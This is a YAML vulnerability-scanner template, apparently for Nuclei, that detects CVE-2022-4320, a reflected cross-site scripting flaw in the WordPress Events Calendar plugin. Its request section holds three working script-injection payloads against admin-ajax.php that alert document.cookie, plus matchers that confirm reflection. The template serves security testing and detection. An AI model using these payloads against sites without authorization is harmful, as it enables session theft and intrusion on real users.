58 lines
2.4 KiB
YAML
58 lines
2.4 KiB
YAML
id: CVE-2022-4320
|
|
|
|
info:
|
|
name: WordPress Events Calendar <1.4.5 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.
|
|
remediation: Fixed in version 1.4.5.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-4320
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-4320
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00114
|
|
epss-percentile: 0.44929
|
|
cpe: cpe:2.3:a:mhsoftware:wordpress_events_calendar_plugin:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: mhsoftware
|
|
product: wordpress_events_calendar_plugin
|
|
framework: wordpress
|
|
tags: calendar,event,xss,wordpress,wp,wp-plugin,cve,cve2022,wpscan
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(document.cookie)</script>'
|
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>'
|
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'imgNavLeftXX\"><script>alert(document.cookie)</script>'
|
|
- '<script>alert(document.cookie)</script>({});'
|
|
- '><script>alert(document.cookie)</script>.js'
|
|
condition: or
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a004630440220706bcd4adcb88c1592b15ae975815e260c1706252de957c290dc0e678868c7550220310efa38c890d9fc8d1c8420bbb1851e394b07bcefb396d4d75fd9a4396bbb71:922c64590222798bb761d5b6d8e72950
|